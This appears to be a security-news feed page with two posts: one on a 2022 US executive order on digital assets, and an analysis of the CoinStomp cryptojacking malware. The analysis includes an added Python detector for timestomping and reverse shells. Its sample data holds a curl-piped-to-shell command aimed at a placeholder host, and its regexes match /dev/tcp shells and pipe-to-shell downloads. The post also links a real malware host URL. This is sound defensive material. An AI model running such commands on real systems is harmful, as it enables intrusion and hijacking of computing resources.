crypto currency - X-Industry - Red Sky Alliance
2024-03-29T07:58:34Z
https://redskyalliance.org/xindustry/feed/tag/crypto+currency

Digital Assets: Good or Bad?
https://redskyalliance.org/xindustry/digital-assets-good-or-bad
2022-03-10T14:37:49.000Z
Bill Schenkelberg (https://redskyalliance.org/members/BillSchenkelberg)
<div><p><a href="{{#staticFileLink}}10200055882,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10200055882,RESIZE_400x{{/staticFileLink}}" width="250" alt="10200055882?profile=RESIZE_400x" /></a>The US president signed an executive order (E.O.) on 9 March for “ensuring responsible innovation in digital assets.” The E.O. is designed to, among other things, crack down on the use of cryptocurrency among cybercriminals.<a href="#_ftn1">[1]</a></p>
<p>This long-awaited directive orders federal agencies, including the Department of Justice and the Treasury Department, to coordinate their approach to the booming cryptocurrency sector. Although the order does not lay out specific policy suggestions, it takes aim at consumer protection, financial stability, illicit financing, leadership in global finance, financial inclusion, and responsible innovation.<a href="#_ftn2">[2]</a></p>
<p>Some of the E.O. provisions include the exploration of a US central bank digital currency, as well as an order to the Treasury Department to issue a report on the future of money and payment systems. The order also builds on the US’s counter-ransomware strategy that has been underway for several months, according to a senior administration official.</p>
<p>Last September, the US Treasury Department announced steps it took to disrupt cryptocurrency exchanges that helped criminal networks launder ransoms, as well as increase incident and ransomware reporting to government agencies and law enforcement. The US Department of Justice and Federal Bureau of Investigation (FBI) have also launched cryptocurrency-focused crime units in recent months.</p>
<p>“Digital assets have facilitated sophisticated cybercrime-related financial networks and activity, including through ransomware activity. The growing use of digital assets in financial activity heightens risks of crimes such as money laundering, terrorist and proliferation financing, fraud and theft schemes, and corruption,” the executive order reads. “These illicit activities highlight the need for ongoing scrutiny of the use of digital assets, the extent to which technological innovation may impact such activities, and exploration of opportunities to mitigate these risks through regulation, supervision, public-private engagement, oversight, and law enforcement.”</p>
<p>The order comes about two weeks after Russia invaded Ukraine, triggering a wide range of sanctions against the country and its top officials. The order makes no mention of the conflict but does highlight in several places how cryptocurrency could be used to circumvent sanctions in general.</p>
<p>However, the senior official said that cryptocurrency would not be a viable workaround for the aggressive sanctions the US has issued across the Russian economy and Russia’s central bank.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a> </li>
</ul>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.whitehouse.gov/briefing-room/presidential-actions/2022/03/09/executive-order-on-ensuring-responsible-development-of-digital-assets/">https://www.whitehouse.gov/briefing-room/presidential-actions/2022/03/09/executive-order-on-ensuring-responsible-development-of-digital-assets/</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://therecord.media/bidens-cryptocurrency-executive-order-will-help-unify-counter-ransomware-strategy/">https://therecord.media/bidens-cryptocurrency-executive-order-will-help-unify-counter-ransomware-strategy/</a></p></div>

A Look into CoinStomp and Cryptojacking
https://redskyalliance.org/xindustry/a-look-into-coinstomp-and-cryptojacking
2022-02-17T14:25:43.000Z
Michael Brousseau (https://redskyalliance.org/members/MichaelBrousseau)
<div><p><a href="{{#staticFileLink}}10115777254,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10115777254,RESIZE_400x{{/staticFileLink}}" alt="10115777254?profile=RESIZE_400x" width="216" /></a>A new malware family is targeting Asian cloud service providers and using compromised resources to mine cryptocurrency. The malware, CoinStomp, makes use of timestomping, command and control (C2) through reverse shells, removal of the target system’s cryptographic policies, and references to a previous cryptojacking campaign, Xanthe.</p>
<p>Cryptojacking is the process of compromising machines and using their resources to mine cryptocurrency. This attack method has grown popular as an alternative to building sophisticated mining rigs, which carry large overhead costs. By compromising existing machines, attackers can mine crypto without paying for the resources. The formula is simple: the more resources an attacker controls, the more crypto they can mine. Cloud service providers (CSPs) are a lucrative target for cryptojacking attackers because they offer Infrastructure as a Service (IaaS), which provides compute resources directly to customers. The infrastructure is already in place; all the attacker needs to do is gain access.</p>
<p>Cryptojacking software is designed to run unbeknownst to the victim. To remain undetected, CoinStomp uses a technique called timestomping. Timestomping is the manipulation of file timestamps, and it is frequently used to confuse and mislead digital forensic investigators. It lets attackers change the access and creation records of malicious files so that they blend into the target environment. A query based on recently installed files and programs will yield little evidence if the timestamps of the malicious files have been manipulated. On Linux systems, a simple “touch” command with the “-t” flag and a made-up timestamp is enough to change a file's timestamp.</p>
<p>Using reverse shells to contact the command and control (C2) servers on port 443, the port normally used for HTTPS traffic, means that this traffic will usually pass seamlessly through the firewall, as outbound HTTPS traffic is not normally restricted. The reverse shell uses /dev/tcp/[host]/[port] to create a TCP connection to the designated host on the specified port; reading from and writing to that device gives the attacker a two-way channel to the compromised host. The malware also uses curl to install additional payloads and to send status updates to the C2 servers.</p>
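<p>The two evasion techniques described above each leave a defender-side artefact. The following Python script is an added example written for this summary; it is not code from the original post, from Red Sky Alliance or from Cado Security. It relies on a Linux detail the post does not spell out: “touch -t” (and the utime() call behind it) rewrites a file's atime and mtime to whatever the caller chooses, but the kernel sets ctime to the current clock at that moment, so a back-dated file shows an old mtime next to a fresh ctime. The script flags such files under a directory, and separately scans a constructed set of crontab lines (the 203.0.113.5 address, the example.invalid host and the deliberately elided “...” command are placeholders, not real CoinStomp indicators) for the /dev/tcp/ pseudo-device and for a downloader piped straight into a shell. The regular expressions and thresholds are the example's own assumptions.</p>

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Constructed sample of crontab / shell-history lines (not real CoinStomp data).
# 203.0.113.5 is a documentation-range address; example.invalid is a placeholder;
# the "..." in line 2 is deliberately elided, so the line is not a working command.
SAMPLE_CRON_LINES = [
    "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf",
    '*/10 * * * * sh -c "... /dev/tcp/203.0.113.5/443 ..."',
    "@reboot curl -fsSL http://example.invalid/x.sh | sh",
    "30 2 * * * /opt/backup/run.sh >> /var/log/backup.log 2>&1",
]

# bash's /dev/tcp/<host>/<port> pseudo-device, and curl/wget output piped into a shell.
DEV_TCP_RE = re.compile(r"/dev/tcp/[^/\s]+/\d+")
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def find_timestomp_candidates(root, min_gap_seconds=60):
    """Flag files whose mtime is more than min_gap_seconds older than ctime.

    On Linux, utime()/`touch -t` set atime and mtime to caller-chosen values,
    but ctime is set by the kernel to "now" on that metadata change, so a
    back-dated file shows old mtime / fresh ctime. Archive extraction and
    package installs produce the same pattern, so hits are triage leads,
    not proof of tampering.
    """
    hits = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        st = path.stat()
        gap = st.st_ctime - st.st_mtime
        if gap > min_gap_seconds:
            hits.append((str(path), round(gap)))
    return hits


def find_reverse_shell_indicators(lines):
    """Return (line_number, line) pairs that match either indicator pattern."""
    return [
        (n, line.strip())
        for n, line in enumerate(lines, 1)
        if DEV_TCP_RE.search(line) or PIPE_TO_SHELL_RE.search(line)
    ]


def demo():
    """Build a throwaway directory with one back-dated file and run both checks."""
    with tempfile.TemporaryDirectory() as tmp:
        normal = Path(tmp) / "notes.txt"
        normal.write_text("ordinary file\n")

        stomped = Path(tmp) / "libupdate.so"
        stomped.write_text("placeholder contents\n")
        # Mimic `touch -t` with a timestamp one year in the past: atime/mtime
        # move back, ctime is set by the kernel to the current time.
        a_year_ago = time.time() - 365 * 86400
        os.utime(stomped, (a_year_ago, a_year_ago))

        flagged = [os.path.basename(p) for p, _ in find_timestomp_candidates(tmp)]
        cron_hits = [n for n, _ in find_reverse_shell_indicators(SAMPLE_CRON_LINES)]
        return {"timestomp_flagged": flagged, "cron_flagged": cron_hits}


if __name__ == "__main__":
    print(demo())  # {'timestomp_flagged': ['libupdate.so'], 'cron_flagged': [2, 3]}
```

<p>In practice the timestamp check is run over directories a miner would drop into (/tmp, /var/tmp, /dev/shm, a user's home) and the line scan over every crontab, systemd timer and shell history on the host; a hit from either is a lead for the incident response process the post describes, not a verdict on its own.</p>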
<p>To allow for successful installation of payloads, CoinStomp uses a command to remove cryptographic policy files. These policies are responsible for allowing or blocking protocols based on the cryptographic protocol version. Usually, insecure protocols will be blocked, but malware often makes use of these protocols for installations and remote connections. By disabling the cryptographic policies CoinStomp can install payloads and make the connections it needs.</p>
<p>CoinStomp uses the cron scheduler to carry out its tasks, and embedded in the code is a URL that has been commented out, meaning nothing in the script actually reaches it. Researchers at Cado Security followed the URL to <a href="http://xanthe.anondns.net:8080/files/fczyo">http://xanthe.anondns.net:8080/files/fczyo</a>. Xanthe was previously a cryptojacking campaign that now has ties to the Abcbot botnet and to Distributed Denial of Service (DDoS) attacks. The Xanthe cryptojacking campaign made use of a script called fczyo. This may point to a connection to the Xanthe campaign, but it is also possible that the reference was planted to mislead investigators.</p>
<p>The recent discovery of the CoinStomp malware family points out that attackers are knowledgeable about cloud security vulnerabilities, Linux security techniques, and how to mislead digital forensics investigators in the incident response process. Cado Security provided Indicators of Compromise (IoCs) which are pictured below.</p>
<p><a href="{{#staticFileLink}}10115777291,RESIZE_930x{{/staticFileLink}}"><img class="align-center" src="{{#staticFileLink}}10115777291,RESIZE_710x{{/staticFileLink}}" alt="10115777291?profile=RESIZE_710x" width="600" /></a><a href="{{#staticFileLink}}10115778058,RESIZE_180x180{{/staticFileLink}}"><img class="align-center" src="{{#staticFileLink}}10115778058,RESIZE_180x180{{/staticFileLink}}" alt="10115778058?profile=RESIZE_180x180" width="171" /></a></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p></div>